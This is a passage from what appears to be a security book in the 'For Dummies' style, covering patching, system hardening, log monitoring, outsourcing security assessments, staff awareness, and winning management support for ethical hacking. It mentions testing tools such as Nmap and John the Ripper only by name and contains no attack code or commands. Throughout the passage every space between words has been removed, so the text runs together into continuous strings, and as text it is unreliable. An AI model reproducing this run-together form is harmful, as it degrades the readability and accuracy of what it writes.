Whateveryoudo,whatevertoolyouchoose,andwhateverproceduresworkbestinyourenvironment,keepyoursystemspatched!Thisgoesforoperatingsystems,webservers,databases,mobileapps,andevenfirmwareonyournetworkfirewalls,routers,andswitches.
Patchingisavoidablebutinevitable.Theonlyrealsolutiontoeliminatingtheneedforpatchesisdevelopingsecuresoftwareinthefirstplace,butthat’snotgoingtohappenanytimesoon,ifever.Softwareisjusttoocomplexforittobeperfect.Alargeportionofsecurityincidentscanbepreventedwithsomegoodpatchingpractices,sothere’ssimplynoreasonnottohaveasolidpatchmanagementprocessinplace.
PatchmanagementIfyoucan’tkeepupwiththedelugeofsecuritypatchesforallyoursystems,don’tdespair;youcanstillgetahandleontheproblem.Herearemybasictenetsforapplyingpatchestokeepyoursystemssecure:
Makesureallthepeopleanddepartmentsthatareinvolvedinapplyingpatchesonyourorganization’ssystemsareonthesamepageandfollowthesameprocedures.Haveformalanddocumentedproceduresinplaceforthesecriticalprocesses:
Obtainingpatchalertsfromyourvendors,includingthird-partypatchesforAdobe,Java,andsoon,whichareoftenoverlooked(andoftenthemostcritical)AssessingwhichpatchesaffectyoursystemsDeterminingwhentoapplypatches
Makeitpolicyandhaveproceduresinplacefortestingpatchesbeforeyouapplythemtoyourproductionservers.Testingpatchesafteryouapplythemisn’tasbigofadealonworkstations,butserversareadifferentstory.Manypatcheshave“undocumentedfeatures”andsubsequentunintendedsideeffects—believeme,I’veexperiencedthisbefore.Anuntestedpatchisaninvitationforsystem
termination!
PatchautomationThefollowingsectionsdescribethevariouspatchdeploymenttoolsyoucanusetolowertheburdenofconstantlyhavingtokeepupwithpatches.
CommercialtoolsIrecommendarobustpatch-automationapplication,especiallyifthesefactorsareinvolved:
AlargenetworkAnetworkwithamultitudeofoperatingsystems(Windows,Linux,MacOSX,andsoon)Alotofthird-partysoftwareapplications,suchasAdobeandJavaMorethanafewdozencomputers
Besuretocheckoutthesepatch-automationsolutions:
EcoraPatchManager(www.ecora.com/ecora/products/patchmanager.asp)GFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)IBMBigFix(www-03.ibm.com/security/bigfix)ShavlikPatch(www.shavlik.com/products/patch)
FreetoolsUseoneofthesefreetoolstohelpwithautomatedpatching:
WindowsServerUpdateServices(WSUS)(http://technet.microsoft.com/en-us/windowsserver/bb332157.aspx)WindowsUpdate,whichisbuiltintoMicrosoftWindowsoperatingsystemsMicrosoftBaselineSecurityAnalyzer(MBSA)(www.microsoft.com/technet/security/tools/mbsahome.mspx)Thebuilt-inpatchingtoolsforLinux-basedsystems(suchasYellowdogUpdater,Modified[yum]andYaSTOnlineUpdate)
HardeningYourSystemsInadditiontopatchingyoursystems,youhavetomakesureyoursystemsarehardened(lockeddown)fromthesecurityvulnerabilitiesthatpatchescan’tfix.I’vefoundthatmanypeoplestopwithpatching,thinkingtheirsystemsaresecure,butthat’sjustnotthecase.Throughouttheyears,I’veseennetworkadministratorsignorerecommendedhardeningpracticesfromsuchorganizationsastheNationalInstituteofStandardsandTechnology(NIST)(http://csrc.nist.gov/publications/PubsSPs.html)andtheCenterforInternetSecurity(www.cisecurity.org),leavingmanysecurityholeswideopen.However,I’matruebelieverthathardeningsystemsfrommaliciousattackisnotfoolproof,either.Becauseeverysystemandeveryorganization’sneedsaredifferent,thereisnoone-size-fits-allsolution,soyouhavetostrikeabalanceandnotrelyonanysingleoptiontoomuch.
It’sagoodideatorescanyoursystemsforvulnerabilitiesonceyourpatchesareapplied.
PayingthepiperIwasonceinvolvedinanincidentresponseprojectthatinvolvedover10,000Windowsserversandworkstationsbeinginfectedwithtargetedmalware.Advancedmalwarehadtakenafoothold.ThebusinessfoundtheinfectionearlyonandthoughttheITteamhadcleaneditup.Timepassed,andtheyrealizedayearorsolatertheyhadnotcleaneduptheentiremess.Themalwarehadcomebackwithavengeancetothepointwheretheirentirenetworkwasessentiallyundersurveillancebyforeign,state-sponsored,criminalhackers.
Afterdozensofpeoplespentmanyhoursgettingtotherootoftheproblem,itwasdeterminedthattheITdepartmenthadnotdonewhatitshould’vebeendoingintermsofpatchingandhardeningitssystemsfromtheget-go.Ontopofthat,therewasaseriouscommunicationbreakdownbetweenITandotherdepartments,includingsecurity,thehelpdesk,andbusinessoperations.Itwasacaseoftoolittletoolatethatendedupgettingaverylargebusinessintoaverylargebind.Thelessonhereisthatimproperlysecuredsystemscancreateatremendousburdenonyourbusiness.
Thisbookpresentshardeningcountermeasuresthatyoucanimplementforyournetwork,computers,andevenphysicalsystemsandpeople.Ifindthesecountermeasuresworkthebestfortherespectivesystems.
Implementingatleastthebasicsecuritypracticesiscritical.WhetherinstallingafirewallonthenetworkorrequiringuserstohavestrongpasswordsviaaWindowsdomainGPO—youmustaddressthebasicsifyouwantanymodicumofsecurity.Beyondpatching,ifyoufollowthecountermeasuresIdocument,addtheotherwell-knownsecuritypracticesfornetworksystems(routers,servers,workstations,andsoon)thatarefreelyavailableontheInternet,andperformongoingsecuritytests,youcanrestassuredthatyou’redoingyourbesttokeepyourorganization’sinformationsecure.
AssessingYourSecurityInfrastructureAreviewofyouroverallsecurityinfrastructurecanaddoomphtoyoursystems:
Lookathowyouroverallnetworkisdesigned.Considerorganizationalissues,suchaswhetherpoliciesareinplace,maintained,oreventakenseriously.Physicalissuescountaswell.Domembersofmanagementhavebuy-inoninformationsecurityandcompliance,ordotheysimplyshrugthemeasureoffasanunnecessaryexpenseorbarriertoconductingbusiness?
Mapyournetworkbyusingtheinformationyougatherfromthesecuritytestsinthisbook.Updatingexistingdocumentationisamajornecessity.OutlineIPaddresses,runningservices,andwhateverelseyoudiscover.Drawyournetworkdiagram—networkdesignandoverallsecurityissuesareawholeloteasiertoassesswhenyoucanworkwiththemvisually.AlthoughIprefertouseatechnicaldrawingprogram,suchasVisioorCheops-ng(http://cheops-ng.sourceforge.net),tocreatenetworkdiagrams,suchatoolisn’tnecessary.Youcandrawoutyourmaponawhiteboardlikemanypeopledoandthat’sjustfine.
Besuretoupdateyourdiagramswhenyournetworkchangesoratleastonceeveryyearorso.
Thinkaboutyourapproachtocorrectingvulnerabilitiesandincreasingyourorganization’soverallsecurity.Areyoufocusingallyoureffortsontheperimeterandnotonalayeredsecurityapproach?Thinkabouthowmostconveniencestoresandbanksareprotected.Securitycamerasfocusonthecashregisters,tellercomputers,andsurroundingareas—notjustontheparkinglotorentrances.Lookatsecurityfromadefensein-depthperspective.Makesurethatseverallayersofsecurityareinplaceincaseonemeasurefails,sotheattackermustgothroughotherbarrierstocarryoutasuccessfulattack.Thinkaboutsecuritypoliciesandproceduresatanorganizationallevel.Documentwhatsecuritypoliciesandproceduresareinplaceandwhetherthey’reeffective.Noorganizationisimmunetogapsinthisarea.Lookattheoverallsecurityculturewithinyourorganizationandseewhatitlookslikefromanoutsider’sperspective.Whatwouldcustomersorbusinesspartnersthinkabouthowyourorganizationtreatstheirsensitiveinformation?
Lookingatyoursecurityfromahigh-levelandnontechnicalperspectivegivesyouanewoutlookonsecurityholes.Ittakessometimeandeffortatfirst,butafteryouestablishabaselineofsecurity,it’smucheasiertomanagenewthreatsandvulnerabilities.
ManagingSecurityProcessesInThisChapter
Automatingtasks
Watchingformisbehavior
Outsourcingyoursecuritytesting
Keepingsecurityoneveryone’smind
Informationsecurityisanongoingprocessthatyoumustmanageeffectivelytobesuccessful.Thismanagementgoesbeyondperiodicallyapplyingpatchesandhardeningsystems.Performingyoursecuritytestsrepeatedlyiscritical;informationsecurityvulnerabilitiesemergeconstantly.Toputitanotherway,securitytestsarejustasnapshotofyouroverallinformationsecurity,soyouhavetoperformyourtestscontinuallytokeepupwiththelatestissues.Ongoingvigilanceisrequirednotonlyforcompliancewithvariouslawsandregulationsbutalsoforminimizingbusinessrisksrelatedtoyourinformationsystems.
AutomatingtheEthicalHackingProcessYoucanrunalargeportionofthefollowingethicalhackingtestsinthisbookautomatically:
Pingsweepsandportscanstoshowwhatsystemsareavailableandwhat’srunningPasswordcrackingteststoattemptaccesstoexternalwebapplications,remoteaccessservers,andsoonVulnerabilityscanstocheckformissingpatches,misconfigurations,andexploitableholesExploitationofvulnerabilities(toanextent,atleast)
Youmusthavetherighttoolstoautomatethesetests,forexample:
Somecommercialtoolscansetupperiodicassessmentsandcreatenicereportsforyouwithoutanyhands-onintervention—justalittlesetupandschedulingtimeupfront.ThisiswhyIlikemanyofthecommercial—andmostlyautomated—securitytestingtools,suchasNexposeandAppSpider.Theautomationyougetfromthesetoolsoftenhelpsjustifytheprice,especiallybecauseyoudon’thavetobeupat2:00a.m.oroncall24hoursadaytomonitorthetesting.Standalonesecuritytools,suchasNmap,JohntheRipper,andAircrack-ng,aregreatbuttheyaren’tenough.YoucanusetheWindowsTaskSchedulerandATcommandsonWindowssystemsandcronjobsonLinux-basedsystems,butmanualstepsandhumanintellectarestillrequired.
LinkstothesetoolsandmanyothersarelocatedintheAppendix.
Certaintestsandphases,suchasenumerationofnewsystems,variouswebapplicationtests,socialengineering,andphysicalsecuritywalkthroughs,simplycannotbesetonautopilot.Youhavetobeinvolved.
Eventhesmartestcomputer“expertsystem”can’taccomplishsecuritytests.Goodsecurityrequirestechnicalexpertise,experience,andgoodold-fashionedcommonsense.
MonitoringMaliciousUseMonitoringsecurity-relatedeventsisessentialforongoingsecurityefforts.Thiscanbeasbasicandmundaneasmonitoringlogfilesonrouters,firewalls,andcriticalserverseveryday.Advancedmonitoringmightincludeimplementingasecurityincidentandeventmanagement(SIEM)systemtomonitoreverylittlethingthat’shappeninginyourenvironment.Acommonmethodistodeployanintrusionpreventionsystem(IPS)ordatalossprevention(DLP)systemandmonitorformaliciousbehavior.
Theproblemwithmonitoringsecurity-relatedeventsisthathumansfinditveryboringandverydifficulttodoeffectively.Eachday,youcoulddedicateatime—suchasfirstthinginthemorning—tocheckingyourcriticallogfilesfromthepreviousnightorweekendtoferretoutintrusionsandothercomputerandnetworksecurityproblems.However,doyoureallywanttosubjectyourselforsomeoneelsetothatkindoftorture?
However,manuallysiftingthroughlogfilesprobablyisn’tthebestwaytomonitorthesystem.Considerthefollowingdrawbacks:
Findingcriticalsecurityeventsinsystemlogfilesisdifficult,ifnotimpossible.It’sjusttootediousataskfortheaveragehumantoaccomplisheffectively.Dependingonthetypeofloggingandsecurityequipmentyouuse,youmightnotevendetectsomesecurityevents,suchasIPSevasiontechniquesandexploitscarriedoutoverallowedportsonthenetwork.
Insteadofpanningthroughallyourlogfilesforhard-to-findintrusions,here’swhatIrecommend:
Enablesystemloggingwhereit’sreasonableandpossible.Youdon’tnecessarilyneedtocaptureallcomputerandnetworkevents,butyoushoulddefinitelylookforcertainobviousones,suchasloginfailures,policychanges,andunauthorizedfileaccess.Logsecurityeventsusingsyslog,awriteoncereadmany(WORM)device,oranothercentralserveronyournetwork.Donotkeeplogsonthelocalhost,ifpossible,tohelppreventthebadguysfromtamperingwithlogfilestocovertheirtracks.
Thefollowingareacoupleofgoodsolutionstothesecurity-monitoringdilemma:
Purchaseanevent-loggingsystem.Afewlow-pricedyeteffectivesolutionsare
available,suchasGFIEventsManager(www.gfi.com/products-and-solutions/network-security-solutions/gfi-eventsmanager).Typically,lower-pricedevent-loggingsystemsusuallysupportonlyoneOSplatform—MicrosoftWindowsisthemostcommon.Higher-endsolutions,suchasHPArcSightLogger(www8.hp.com/us/en/software-solutions/arcsight-logger-log-management),offerbothlogmanagementacrossvariousplatformsandeventcorrelationtohelptrackdownthesourceofsecurityproblemsandthevarioussystemsaffectedduringanincident.
Outsourcesecuritymonitoringtoathird-partymanagedsecurityservicesprovider(MSSP)inthecloud.DozensofMSSPswerearoundduringtheInternetboom,butonlyafewbigonesremain,suchasDellSecureWorks(www.secureworks.com)andAlertLogic(www.alertlogic.com).Nowconsideredcloudserviceproviders,thevalueinoutsourcingsecuritymonitoringisthatthesecompaniesoftenhavefacilitiesandtoolsthatyouwouldlikelynotbeabletoaffordandmaintain.Theyalsohaveanalystsworkingaroundtheclockandhavethesecurityexperienceandknowledgetheygainfromothercustomerstosharewithyou.
Whenthesecloudserviceprovidersdiscoverasecurityvulnerabilityorintrusion,theycanusuallyaddresstheissueimmediately,oftenwithoutyourinvolvement.Irecommendatleastcheckingwhetherthird-partyfirmsandtheirservicescanfreesomeofyourtimeandresourcessothatyoucanfocusonotherthings.Justdon’tdependsolelyontheirmonitoringefforts;acloudserviceprovidermayhavetroublecatchinginsiderabuse,socialengineeringattacks,andwebapplicationexploitsthatarecarriedoutoversecuredsessions(i.e.,HTTPS).Youstillneedtobeinvolved.
OutsourcingSecurityAssessmentsOutsourcingyoursecurityassessmentsisverypopularandagreatwayfororganizationstogetanunbiasedthird-partyperspectiveoftheirinformationsecurity.Outsourcingallowsyoutohaveachecks-and-balancessystemthatclients,businesspartners,auditors,andregulatorsliketosee.
Outsourcingethicalhackingcanbeexpensive.Manyorganizationsspendtensofthousandsofdollars—oftenmore—dependingonthetestingneeded.However,doingallthisyourselfisn’tcheap—andquitepossiblyitisn’taseffective,either!
Alotofconfidentialinformationisatstake,soyoumusttrustyouroutsideconsultantsandvendors.Considerthefollowingquestionswhenlookingforanindependentexpertorvendortopartnerwith:
Isyoursecurityprovideronyoursideorathird-partyvendor’sside?Istheprovidertryingtosellyouproducts,oristheprovidervendorneutral?Manyprovidersmighttrytomakeafewmoredollarsoffthedealbutrecommendedproductsandservicesfromvendorstheypartnerwith,whichmightnotbenecessaryforyourneeds.Makesurethatthesepotentialconflictsofinterestaren’tbadforyourbudgetandyourbusiness.WhatotherITorsecurityservicesdoestheprovideroffer?Doestheproviderfocussolelyonsecurity?HavinganinformationsecurityspecialistdothistestingforyouisoftenbetterthanworkingwithanITgeneralistorganization.Afterall,wouldyouhireageneralcorporatelawyertohelpyouwithapatent,afamilypractitionertoperformsurgery,orahandymantorewireyourhouse?Whatareyourprovider’shiringandterminationpolicies?Lookformeasurestheprovidertakestominimizethechancesthatanemployeewillwalkoffwithyoursensitiveinformation.Doestheproviderunderstandyourbusinessneeds?Havetheproviderrepeatthelistofyourneedsandputtheminwritingtomakesureyou’rebothonthesamepage.Howwelldoestheprovidercommunicate?Doyoutrusttheprovidertokeepyouinformedandfollowupwithyouinatimelymanner?Doyouknowexactlywhowillperformthetests?Willonepersondothetesting,orwillsubject-matterexpertsfocusonthedifferentareas?Doestheproviderhavetheexperiencetorecommendpracticalandeffectivecountermeasurestothevulnerabilitiesfound?Theprovidershouldn’tjusthand
youathinkreportandsay,“Goodluckwithallthat!”Youneedrealisticsolutions.Whataretheprovider’smotives?Doyougettheimpressionthattheproviderisinbusinesstomakeaquickbuckofftheservices,withminimaleffortandvalueadded,oristheproviderinbusinesstobuildloyaltywithyouandestablishalong-termrelationship?
Findingagoodorganizationtoworkwithlong-termwillmakeyourongoingeffortsmuchsimpler.Askforseveralreferencesandsamplesanitizeddeliverables(thatis,reportsthatdon’tcontainsensitiveinformation)frompotentialproviders.Iftheorganizationcan’tproducethesewithoutdifficulty,lookforanotherprovider.
Yourprovidershouldhaveitsowncontractforyouthatincludesamutualnondisclosureverbiage.Makesureyoubothsignthistohelpprotectyourorganization.
Thinkingabouthiringareformedhacker?Formerhackers—I’mreferringtotheblackhathackerswhohavehackedintocomputersystemsinthepastandendedupservingtimeinprison—canbeverygoodatwhattheydo.Manypeopleswearbyhiringreformedhackerstodotheirtesting.Otherscomparethistohiringtheproverbialfoxtoguardthehenhouse.Ifyou’rethinkingaboutbringinginaformer(un)ethicalhackertotestyoursystems,considertheseissues:
Doyoureallywanttorewardmaliciousbehaviorwithyourorganization’sbusiness?
Ahackerclaimingtobe“reformed”doesn’tmeanheorsheis.Therecouldbedeep-rootedpsychologicalissuesorcharacterflawsyou’regoingtohavetocontendwith.Buyerbeware!
Informationgatheredandaccessedduringsecurityassessmentsissomeofthemostsensitiveinformationyourorganizationpossesses.Ifthisinformationgetsintothewronghands—eventenyearsdowntheroad—itcouldbeusedagainstyou.Somehackersandreformedcriminalshangoutintightsocialgroups.Youmightnotwantyourinformationsharedintheircircles.
Thatsaid,everyonedeservesachancetoexplainwhathappenedinthepast.Zerotoleranceissenseless.Listentohisorherstoryandusecommon-sensediscretionastowhetheryoutrustthepersontohelpyou.Thesupposedblackhathackeractuallymighthavebeenagrayhathackeroramisguidedwhitehathackerwhofitswellinyourorganization.
InstillingaSecurity-AwareMindsetYournetworkusersareoftenyourfirstandlastlineofdefense.Makesureyourethicalhackingeffortsandthemoneyspentonyourinformationsecurityinitiativesaren’twastedbecauseasimpleemployeeslip-upgaveamaliciousattackerthekeystothekingdom.
Thefollowingelementscanhelpestablishasecurity-awarecultureinyourorganization:
Makesecurityawarenessandongoingtraininganactiveprocessamongallemployeesandusersonyournetwork,includingmanagementandcontractors.One-timetrainingsuchaswhenemployeesareinitiallyhiredisnotenough.Awarenessandtrainingmustbeperiodicandconsistenttoensureyoursecuritymessagesarekeptatthetopofpeople’sminds.
Treatawarenessandtrainingprogramsasalong-termbusinessinvestment.Securityawarenessprogramsdon’thavetobeexpensive.Youcanbuyposters,mousepads,screensavers,pens,andstickynotestohelpkeepsecurityoneveryone’smind.SomecreativesolutionsvendorsareGreenidea,Inc.(www.greenidea.com),SecurityAwareness,Inc.(www.securityawareness.com),andmyfavorite(becauseofitsfounder,WinnSchwartau,who’sahilariousguywho’snotafraidtotellitlikeitis)TheSecurityAwarenessCompany(www.thesecurityawarenesscompany.com).
Getthewordonsecurityouttomanagement!Ifyoukeepmembersofmanagementinthedarkonwhatyou’redoing,they’lllikelyneverbeonyourside.Icovergettingsecuritybuy-ininChapter20.Alignyoursecuritymessagewithyouraudienceandkeepitasnontechnicalaspossible.Thelastthingyouwanttodoisunloadabunchofgeek-speakontopeoplewhohavenocluewhatyou’retalkingabout.You’llendupwithoppositethedesiredeffortyou’regoingfor.Putyourmessagesintermsofeachgroupyou’respeakingto:howsecurityimpactsthemandhowtheycanhelp.Leadbyexample.Showthatyoutakesecurityseriouslyandofferevidencethathelpsprovethateveryoneelseshould,too.
Ifyoucangettheearofmanagementandusersandputforthenoughefforttomakesecurityaprioritydayafterday,youcanhelpshapeyourorganization’sculture.Ittakesworkbutitcanprovidesecurityvaluebeyondyourwildestimagination.I’veseenthedifferenceitmakes!
KeepingUpwithOtherSecurityEffortsEthicalhackingviaongoingsecurityassessmentisnotthebe-allandend-allsolutiontoinformationsecurity.Itwillnotguaranteesecurity,butit’scertainlyagreatstart.Thistestingmustbeintegratedaspartofanoverallinformationsecurityprogramthatincludes
Higher-levelinformationriskassessmentsStrongsecuritypoliciesandstandardsthatareenforcedandproperlyadheredtoSolidincidentresponseandbusinesscontinuityplansEffectivesecurityawarenessandtraininginitiatives
Theseeffortsmightrequirehiringmorestafforoutsourcingmoresecurityhelpaswell.
Don’tforgetaboutformaltrainingforyourselfandanycolleagueswhoarehelpingyou.Youhavetoeducateyourselfconsistentlytostayontopofthesecuritygame.Therearegreatconferences,seminars,andonlineresourcesforthisthatIoutlineintheAppendix.
ThePartofTens
Visitwww.dummies.com/extras/hackingforgreatDummiescontentonline.
Inthispart…Well,here’stheendoftheroad,sotospeak.Inthispart,I’vecompiledtop-tenlistsofwhatIbelievearetheabsolutecriticalsuccessfactorstomakeyoursecuritytesting—andinformationsecurityingeneral—workinyourorganization.Bookmark,dog-ear,ordowhateveryouneedtodowiththesepagessoyoucanrefertotheminthefuture.Thisisthemeatofwhatyouneedtoknowaboutinformationsecurity,compliance,andmanaginginformationrisks—evenmoresothanthetechnicaltestsandcountermeasuresI’vecoveredthusfar.Readit,studyit,andmakeithappen.Youcandoit!
Inaddition,theAppendixcontainsalistingofmyfavoritesecuritytestingtoolsandresourcesthatI’vecovered(andmore),brokendownintovariouscategoriesforeasyreference.
TenTipsforGettingSecurityBuy-InDozensofkeystepsexistforobtainingthebuy-inandsponsorshipthatyouneedtosupportyoursecuritytestingefforts.Inthischapter,IdescribethetoptenIfindtobethemosteffective.
CultivateanAllyandaSponsorAlthoughrecentbreachesandcompliancepressuresarehelpingpushthingsalong,sellingsecuritytomanagementisn’tsomethingyouwanttotacklealone.Getanally—preferablyyourdirectmanagerorsomeoneatthatlevelorhigherintheorganization.Choosesomeonewhounderstandsthevalueofsecuritytestingaswellasinformationsecurityingeneral.Althoughthispersonmightnotbeabletospeakforyoudirectly,heorshecanbeseenasanunbiasedsponsorandcangiveyoumorecredibility.
Don’tBeaFUDdyDuddySherlockHolmessaid,“Itisacapitalmistaketotheorizebeforeonehasdata.”Tomakeagoodcaseforinformationsecurityandtheneedforvulnerabilitytesting,supportyourcasewithrelevantdata.However,don’tblowstuffoutofproportionforthesakeofstirringupfear,uncertainty,anddoubt(FUD).Managersworththeirsaltcanseerightthroughthat.Focusoneducatingmanagementwithpracticaladvice.Rationalfearsproportionaltothethreatarefine.Justdon’ttaketheChickenLittleroute,claimingthattheskyisfallingwitheverythingallthetime.That’stiringtothoseoutsideofITandsecurityandwillonlyhurtyouoverthelonghaul.
DemonstrateHowtheOrganizationCan’tAffordtoBeHacked
Showhowdependenttheorganizationisonitsinformationsystems.Createwhat-ifscenarios—sortofabusinessimpactassessment—toshowwhatcanhappen,howtheorganization’sreputationcanbedamaged,andhowlongtheorganizationcangowithoutusingthenetwork,computers,anddata.Askupper-levelmanagerswhattheywoulddowithouttheircomputersystemsandITpersonnel—orwhatthey’ddoifsensitivebusinessorclientinformationwascompromised.Showreal-worldanecdotalevidenceofbreaches,includingmalware,physicalsecurity,andsocialengineeringissues,butbepositiveaboutit.Don’tapproachmanagementnegativelywithFUD.Rather,keeptheminformedonserioussecurityhappenings.Oddsarethey’realreadyreadingaboutthesethingsinmajorbusinessmagazinesandnewspapers.Figureoutwhatyoucandotoapplythosestoriestoyoursituation.Tohelpmanagementrelate,findstoriesregardingsimilarbusinesses,competitors,orindustries.(AgoodresourceisthePrivacyRightsClearinghouseChronologyofDataBreachesatwww.privacyrights.org/data-breach.)TheannualVerizonDataBreachInvestigationsReport(www.verizonenterprise.com/DBIR),amongothers,isalsoagreatresource.Letthefactsspeakforthemselves.
GoogleandBingaregreattoolstofindpracticallyeverythingyouneedregardinginformationsecuritybreaches.
Showmanagementthattheorganizationdoeshavewhatahackerwants.Acommonmisconceptionamongthoseignorantaboutinformationsecuritythreatsandvulnerabilitiesisthattheirorganizationornetworkisnotreallyatrisk.Besuretopointoutthepotentialcostsfromdamagecausedbyhacking,suchas:
MissedopportunitycostsExposureofintellectualpropertyLiabilityissuesLegalcostsandjudgmentsCompliance-relatedfinesCriminalpunishmentsLostproductivityClean-uptimeandincidentresponsecostsReplacementcostsforlost,exposed,ordamagedinformationorsystemsCostsoffixingatarnishedreputation(itcantakealifetimetobuildareputationandmereminutesforittogoaway)
OutlinetheGeneralBenefitsofSecurityTesting
Inadditiontothepotentialcostslistedintheprecedingsection,talkabouthowproactivetestingcanhelpfindsecurityvulnerabilitiesininformationsystemsthatnormallymightbeoverlooked.Tellmanagementthatsecuritytestinginthecontextofethicalhackingisawayofthinkinglikethebadguyssothatyoucanprotectyourselffromthem—the“knowyourenemy”mindsetfromSunTzu’sTheArtofWar.
ShowHowSecurityTestingSpecificallyHelpstheOrganization
Documentbenefitsthatsupporttheoverallbusinessgoals:
Demonstratehowsecuritydoesn’thavetobeultra-expensiveandcansavetheorganizationmoneyinthelongrun.
Securityismucheasierandcheapertobuild-inupfrontthantoadd-onlater.Securitydoesn’thavetobeinconvenientorhinderproductivityifit’sdoneproperly.
Discusshownewproductsorservicescanbeofferedforacompetitiveadvantageifsecureinformationsystemsareinplace.
Stateandfederalprivacyandsecurityregulationsaremet.Businesspartnerandcustomerrequirementsaresatisfied.Managersandthecompanycomeacrossasbusiness-worthyintheeyesofcustomersandbusinesspartners.Asolidsecuritytestingprogramandtheappropriateremediationprocessshowthattheorganizationisprotectingsensitivecustomerandbusinessinformation.
Outlinethecomplianceandauditbenefitsofin-depthsecuritytesting.
GetInvolvedintheBusinessUnderstandthebusiness—howitoperates,whothekeyplayersare,andwhatpoliticsareinvolved:
Gotomeetingstoseeandbeseen.Thiscanhelpprovethatyou’reconcernedaboutthebusiness.Beapersonofvaluewho’sinterestedincontributingtothebusiness.Knowyouropposition.Again,usethe“knowyourenemy”mentality—ifyouunderstandthepeopleyou’redealingwithinternally,alongwiththeirpotentialobjections,buy-inismucheasiertoget.Thisgoesnotonlyformanagementbutalsoyourpeersandpracticallyeveryuseronthenetwork.
EstablishYourCredibilityIthinkoneofthebiggestimpedimentsholdingITandsecurityprofessionalsbackispeoplenot“getting”us.Yourcredibilityisallyou’vegot.Focusonthesefourcharacteristicstobuilditandmaintainit:
Bepositiveabouttheorganizationandprovethatyoureallymeanbusiness.Yourattitudeiscritical.Empathizewithmanagersandshowthemthatyouunderstandthebusinesssideandwhatthey’reupagainst.Determinewaysthatyoucanhelpothersgetwhattheyneed.Tocreateanypositivebusinessrelationship,youmustbetrustworthy.Buildthattrustovertime,andsellingsecuritywillbemucheasier.
SpeakonManagement’sLevelAscoolasitsounds,nooneoutsideofITandsecurityisreallythatimpressedwithtechietalk.Oneofthebestwaystolimitorreduceyourcredibilityistocommunicatewitheveryoneinthisfashion.Talkintermsofthebusiness.Talkintermsofwhatyourspecificaudienceneedstohear.Otherwise,oddsaregreatthatit’llgorightovertheirheads.
I’veseencountlessITandsecurityprofessionalsloseupper-levelmanagersassoonastheystartspeaking.Amegabytehere;statefulinspectionthere;packets,packetseverywhere!Badidea.Relatesecurityissuestoeverydaybusinessprocesses,jobfunctions,andoverallgoals.Period.
ShowValueinYourEffortsHere’swheretherubbermeetstheroad.Ifyoucandemonstratethatwhatyou’redoingoffersbusinessvalueonanongoingbasis,youcanmaintainagoodpaceandnothavetoconstantlypleadtokeepyoursecuritytestingprogramgoing.Keepthesepointsinmind:
DocumentyourinvolvementinITandinformationsecurity,andcreateongoingreportsformanagementregardingthestateofsecurityintheorganization.Givemanagementexamplesofhowtheorganization’ssystemsare,orwillbe,securedfromattacks.Outlinetangibleresultsasaproofofconcept.Showsamplevulnerabilityassessmentreportsyou’verunonyoursystemsorfromthesecuritytoolvendors.Treatdoubts,concerns,andobjectionsbymanagementandusersasrequestsformoreinformation.Findtheanswersandgobackarmedandreadytoproveyourownworthiness.
BeFlexibleandAdaptablePrepareyourselfforskepticismandrejection.Evenashotassecurityistoday,itstillhappens,especiallywithupper-levelmanagerssuchasCFOsandCEOs,whoareoftendisconnectedfromITandsecurityintheorganization.Amiddle-managementstructurethatlivestocreatecomplexityisapartytotheproblemaswell.
Don’tgetdefensive.Securityisalong-termprocess,notashort-termproductorsingleassessment.Startsmall—usealimitedamountofresources,suchasbudget,tools,andtime,andthenbuildtheprogramovertime.
Studieshavefoundthatnewideaspresentedcasuallyandwithoutpressureareconsideredandhaveahigherrateofacceptancethanideasthatareforcedonpeopleunderadeadline.Justaswithaspouseorcolleaguesatwork,ifyoufocusonandfine-tuneyourapproach—atleastasmuchasyoufocusonthecontentofwhatyou’regoingtosay—youcanoftengetpeopleonyourside,andinreturn,getalotmoreaccomplishedwithyoursecurityprogram.
TenReasonsHackingIstheOnlyEffectiveWaytoTest
Approachingyoursecuritytestingfromtheperspectiveofethicalhackingisnotjustforfunorshow.Fornumerousbusinessreasons,it’stheonlyeffectivewaytofindthesecurityvulnerabilitiesthatmatterinyourorganization.
TheBadGuysThinkBadThoughts,UseGoodTools,andDevelopNewMethods
Ifyou’regoingtokeepupwithexternalattackersandmaliciousinsiders,youhavetostaycurrentonthelatestattackmethodsandtoolsthatthey’reusing.Icoversomeofthelatesttricks,techniques,andtoolsthroughoutthisbook.
ITGovernanceandComplianceAreMorethanHigh-LevelChecklistAudits
Withallthegovernmentandindustryregulationsinplace,yourbusinesslikelydoesn’thaveachoiceinthematter.Youhavetoaddresssecurity.Theproblemisthatbeingcompliantwiththeselawsandregulationsdoesn’tautomaticallymeanyournetworkandinformationaresecure.ThePaymentCardIndustryDataSecurityStandard(PCIDSS)comestomindhere.Therearecountlessbusinessesrunningtheirvulnerabilityscansandansweringtheirself-assessmentquestionnairesassumingthatthat’sallthat’sneededtomanagetheirinformationsecurityprograms.Youhavetotakeoffthechecklistauditblindersandmovefromacompliance-centricapproachtoathreat-centricapproach.Usingthetoolsandtechniquescoveredinthisbookenablesyoutodigdeeperintoyourbusiness’struevulnerabilities.
HackingComplementsAuditsandSecurityEvaluations
Nodoubt,someoneinyourorganizationunderstandshigher-levelsecurityauditsbetterthanthisethicalhackingstuff.However,ifyoucansellthatpersononmorein-depthsecuritytestingandintegrateitintoexistingsecurityinitiatives(suchasinternalauditsandcompliancespotchecks),theauditingprocesscangomuchdeeperandimproveyouroutcomes.Everyonewins.
CustomersandPartnersWillAsk,‘HowSecureAreYourSystems?’
Manybusinessesnowrequirein-depthsecurityassessmentsoftheirbusinesspartners.Thesamegoesforcertaincustomers.Thebiggercompaniesalmostalwayswanttoknowhowsecuretheirinformationiswhilebeingprocessedorstoredinyourenvironment.Youcannotrelyondatacenterauditreportssuchasthecommonly-referencedSSAE16ServiceOrganizationalControls(SOC)2standardfordatacentersecurityaudits.TheonlywaytodefinitivelyknowwherethingsstandistousethemethodsandtoolsIcoverinthisbook.
TheLawofAveragesWorksAgainstBusinesses
Informationsystemsarebecomingmorecomplexbytheday.Literally.Withthecloud,virtualization,andmobilebeingfrontandcenterinmostenterprises,it’sgettingmoreandmoredifficultforITandsecuritymanagerstokeepup.It’sjustamatteroftimebeforethesecomplexitiesworkagainstyouandinthebadguys’favor.Acriminalhackerneedstofindonlyonecriticalflawtobesuccessful.Youhavetofindthemall.Ifyou’regoingtostayinformedandensurethatyourcriticalbusinesssystemsandthesensitiveinformationtheyprocessandstorestaysecure,youhavetolookatthingswithamaliciousmindsetanddosoperiodicallyandconsistentlyovertime,notjustonceeverynowandthen.
